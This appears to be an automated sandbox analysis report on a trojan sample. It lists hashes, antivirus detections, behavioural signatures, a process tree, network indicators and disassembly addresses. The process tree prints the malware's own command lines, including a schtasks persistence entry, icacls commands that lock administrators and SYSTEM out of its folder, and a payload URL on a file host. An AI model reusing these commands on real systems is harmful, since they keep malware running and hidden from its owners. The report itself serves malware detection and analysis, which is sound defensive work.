Play interactive tour

Edit tour

Analysis Report wa71myDkbQ

Overview

General Information

Sample Name:	wa71myDkbQ (renamed file extension from none to exe)
Analysis ID:	432870
MD5:	c4050e6bdd335e319ca7b848d53b9108
SHA1:	5fe92c2d7dc68a5ffe2f40270bb994d8ea4e62ef
SHA256:	5db793f73ecffd1d88da746f8ce03d798b65b9ab2bc13df307f25de29be546dc
Tags:	exetrojan
Infos:
Most interesting Screenshot:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

.NET source code contains potential unpacker

Allocates memory in foreign processes

Contains functionality to inject code into remote processes

Creates HTML files with .exe extension (expired dropper behavior)

Creates autostart registry keys with suspicious names

Creates files in alternative data streams (ADS)

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: WScript or CScript Dropper

Tries to delay execution (extensive OutputDebugStringW loop)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

wa71myDkbQ.exe (PID: 3192 cmdline: 'C:\Users\user\Desktop\wa71myDkbQ.exe' MD5: C4050E6BDD335E319CA7B848D53B9108)

wscript.exe (PID: 5588 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

Izhwsiraoosvchost.exe (PID: 3332 cmdline: 'C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe' MD5: EEA980187EA08E02E70765195BB1E473)

cmd.exe (PID: 5008 cmdline: 'C:\Windows\System32\cmd.exe' /c schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2916 cmdline: schtasks /create /tn {AELSS3UH-VR7V-NBSY-5O4X-Q8QSBKMTZAA2} /tr C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe /ri 10 /st 00:00 /sc daily /du 9999:59 /f MD5: 15FF7D8324231381BAD48A052F85DF04)

cmd.exe (PID: 2900 cmdline: 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny '*S-1-1-0:(R,REA,RA,RD)' '*S-1-5-7:(R,REA,RA,RD)' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

icacls.exe (PID: 5168 cmdline: icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny '*S-1-1-0:(R,REA,RA,RD)' '*S-1-5-7:(R,REA,RA,RD)' MD5: FF0D1D4317A44C951240FAE75075D501)

cmd.exe (PID: 2008 cmdline: 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

icacls.exe (PID: 5796 cmdline: icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'SYSTEM:(R,REA,RA,RD)' MD5: FF0D1D4317A44C951240FAE75075D501)

cmd.exe (PID: 5824 cmdline: 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

icacls.exe (PID: 5948 cmdline: icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Administrators:(R,REA,RA,RD)' MD5: FF0D1D4317A44C951240FAE75075D501)

cmd.exe (PID: 5956 cmdline: 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

icacls.exe (PID: 5144 cmdline: icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'Users:(R,REA,RA,RD)' MD5: FF0D1D4317A44C951240FAE75075D501)

cmd.exe (PID: 5648 cmdline: 'C:\Windows\System32\cmd.exe' /c icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

icacls.exe (PID: 5656 cmdline: icacls 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}' /inheritance:e /deny 'user:(R,REA,RA,RD)' MD5: FF0D1D4317A44C951240FAE75075D501)

AIKY.exe (PID: 244 cmdline: 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe' MD5: EEA980187EA08E02E70765195BB1E473)

wa71myDkbQ.exe (PID: 3188 cmdline: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe MD5: C4050E6BDD335E319CA7B848D53B9108)

AIKY.exe (PID: 5592 cmdline: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe MD5: EEA980187EA08E02E70765195BB1E473)

AIKY.exe (PID: 5044 cmdline: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe MD5: EEA980187EA08E02E70765195BB1E473)

WerFault.exe (PID: 5532 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 928 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

AIKY.exe (PID: 5292 cmdline: 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe' MD5: EEA980187EA08E02E70765195BB1E473)

AIKY.exe (PID: 5288 cmdline: 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe' MD5: EEA980187EA08E02E70765195BB1E473)

AIKY.exe (PID: 5956 cmdline: 'C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe' MD5: EEA980187EA08E02E70765195BB1E473)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\wa71myDkbQ.exe' , ParentImage: C:\Users\user\Desktop\wa71myDkbQ.exe, ParentProcessId: 3192, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Ovwofzapxgm.vbs' , ProcessId: 5588

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Avira: detection malicious, Label: HEUR/AGEN.1136766
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Avira: detection malicious, Label: HEUR/AGEN.1136766

Multi AV Scanner detection for dropped file

Show sources

Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	ReversingLabs: Detection: 82%

Multi AV Scanner detection for submitted file

Show sources

Source: wa71myDkbQ.exe	Virustotal: Detection: 71%			Perma Link
Source: wa71myDkbQ.exe	ReversingLabs: Detection: 82%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: wa71myDkbQ.exe

Joe Sandbox ML: detected

Source: wa71myDkbQ.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 217.64.149.169:443 -> 192.168.2.7:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.26:443 -> 192.168.2.7:49728 version: TLS 1.2

Source: wa71myDkbQ.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wininet.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdbT8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdbX8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdbj8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb"8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb68 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb:8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdbl8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdbR8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: comdlg32.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb<8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc.pdbN8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbp8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000002F.00000003.431937820.0000000005550000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000002F.00000003.431731451.0000000005451000.00000004.00000001.sdmp
Source:	Binary string: rasadhlp.pdb(8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbf8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 0000002F.00000003.431833581.0000000005551000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb~8 source: WerFault.exe, 0000002F.00000003.431854024.0000000005558000.00000004.00000040.sdmp

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0041E3B5 FindFirstFileExA,	13_2_0041E3B5
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E99BE4 FindFirstFileExW,	14_2_00E99BE4
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B59BE4 FindFirstFileExW,	25_2_00B59BE4
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 33_2_00B59BE4 FindFirstFileExW,	33_2_00B59BE4
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 36_2_00B59BE4 FindFirstFileExW,	36_2_00B59BE4

Networking:

Creates HTML files with .exe extension (expired dropper behavior)

Show sources

Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe

File created: QshTYpu5dWRfMPie.exe.13.dr

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

Code function: 14_2_00E889B2 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

14_2_00E889B2

Source: unknown

DNS traffic detected: queries for: cdn-101.anonfiles.com

Source: WerFault.exe, 0000002F.00000003.452879282.0000000005121000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft
Source: wa71myDkbQ.exe, 00000000.00000002.352158045.00000000028A1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/abuse
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/br
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/de
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/dk
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/docs/api
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/es
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/faq
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/feedback
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/fi
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/fr
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/in
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/jp
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/kr
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/login
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/no
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/pl
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/register
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/ru
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/se
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/terms
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://anonfiles.com/us
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://cdn-101.anonfiles.com/P1hemdxeu9/4573c555-1623353401/cmd.exe
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js
Source: QshTYpu5dWRfMPie.exe.13.dr	String found in binary or memory: https://oss.maxcdn.com/respond/1.4.2/respond.min.js

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727

Source: unknown	HTTPS traffic detected: 217.64.149.169:443 -> 192.168.2.7:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.10.26:443 -> 192.168.2.7:49728 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe

Code function: 14_2_00E84426 send,recv,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetTopWindow,GetWindow,GetWindow,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SetStretchBltMode,StretchBlt,DeleteObject,DeleteDC,GetDIBits,DeleteObject,ReleaseDC,DeleteDC,

14_2_00E84426

Source: AIKY.exe, 00000019.00000002.380130643.0000000000FFA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe

Code function: 33_2_00B4616C OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,

33_2_00B4616C

System Summary:

Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_003639A2	0_2_003639A2
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_00C122C0	0_2_00C122C0
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_00C13320	0_2_00C13320
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_00C122FA	0_2_00C122FA
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_00C122B0	0_2_00C122B0
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_00C13648	0_2_00C13648
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_00C12A33	0_2_00C12A33
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_00C133C1	0_2_00C133C1
Source: C:\Users\user\Desktop\wa71myDkbQ.exe	Code function: 0_2_00C12B22	0_2_00C12B22
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040E018	13_2_0040E018
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040A0DA	13_2_0040A0DA
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040E882	13_2_0040E882
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0041B1D2	13_2_0041B1D2
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_00412AB0	13_2_00412AB0
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040E44D	13_2_0040E44D
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040DC00	13_2_0040DC00
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0041CDD9	13_2_0041CDD9
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040D704	13_2_0040D704
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_0040BF30	13_2_0040BF30
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_00424FD0	13_2_00424FD0
Source: C:\Users\user\AppData\Local\Temp\wa71myDkbQ.exe	Code function: 13_2_005339A2	13_2_005339A2
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E899C5	14_2_00E899C5
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E89CBF	14_2_00E89CBF
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E8301E	14_2_00E8301E
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E9F289	14_2_00E9F289
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E85BB1	14_2_00E85BB1
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E9FB09	14_2_00E9FB09
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E8A582	14_2_00E8A582
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E9C611	14_2_00E9C611
Source: C:\Users\user\AppData\Local\Temp\Izhwsiraoosvchost.exe	Code function: 14_2_00E84F57	14_2_00E84F57
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B4301E	25_2_00B4301E
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B499C5	25_2_00B499C5
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B5F289	25_2_00B5F289
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B45BB1	25_2_00B45BB1
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B5FB09	25_2_00B5FB09
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B49CBF	25_2_00B49CBF
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B4A582	25_2_00B4A582
Source: C:\ProgramData\{M055YUNB-FDR0-F9S1-IAP2-I6YVHFCKPVZM}\AIKY.exe	Code function: 25_2_00B5C611	25_2_00B5C611
